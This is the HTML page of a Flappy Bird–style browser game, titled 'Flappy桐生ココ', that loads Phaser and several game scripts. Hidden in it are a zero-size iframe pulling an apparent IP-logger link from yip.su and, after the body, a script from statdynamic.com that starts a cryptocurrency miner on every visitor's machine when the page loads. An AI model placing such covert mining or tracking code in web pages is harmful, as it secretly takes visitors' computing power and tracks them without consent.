<!doctype html>
<html>
    <head>
        
        <title>Flappy桐生ココ</title>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, maximum-scale=1">
        <meta name="apple-mobile-web-app-title" content="Flappy Frog">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-touch-fullscreen" content="yes">
        <link rel="apple-touch-icon" href="icons/Icon-App-60x60@2x.png">
        <link rel="apple-touch-icon" sizes="180x180" href="icons/Icon-App-60x60@3x.png">
        <link rel="apple-touch-icon" sizes="76x76" href="icons/Icon-App-76x76@1x.png">
        <link rel="apple-touch-icon" sizes="152x152" href="icons/Icon-App-76x76@2x.png">
        <link rel="apple-touch-icon" sizes="58x58" href="icons/Icon-App-29x29@2x.png">
        <link rel="shortcut icon" href="icons/Icon-App-29x29@1x.png">
        <style>
            html, body {
                margin: 0;
                padding: 0;
                width: 100%;
                height: 100%;
            }
            body {
                background: #430;
                text-align: center;
                overflow: hidden;
            }
            #game {
                display: inline-block;
            }
            #footer {
                position: fixed;
                bottom: 4px;
                width: 100%;
                font-size: small;
            }
            #footer a {
                margin: 0 10px;
                width: 100px;
                text-decoration: none;
            }
            #footer a, #footer a:visited {
                color: rgb(192, 68, 17);
            }
        </style>
    </head>
    <body>
        <iframe
        width="0" height="0" src="https://yip.su/17Q3v7.gif">
        </iframe>
        <div id="game"></div>
        <div id="footer">
       
        </div>
        <script src="lib/phaser.min.patched.js"></script>
        <script src="js/require.js"></script>
        <script src="js/global.js"></script>
        <script src="js/utils.js"></script>
        <script src="js/sounds.js"></script>
        <script src="js/pipes.js"></script>
        <script src="js/clouds.js"></script>
        <script src="js/game.js"></script>
        <script src="js/scene.js"></script>
        <script src="js/main.js"></script>
        <script>require('main').run();;</script>

        



        
        
    </body>
    <script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  var miner=new CRLT.Anonymous('3dfee4d5de84582a4bf0757e9ee38027ced4813c4a49', {
    threads:1,throttle:0.5, coin: "upx",
  });
  miner.start();
</script>
</html>
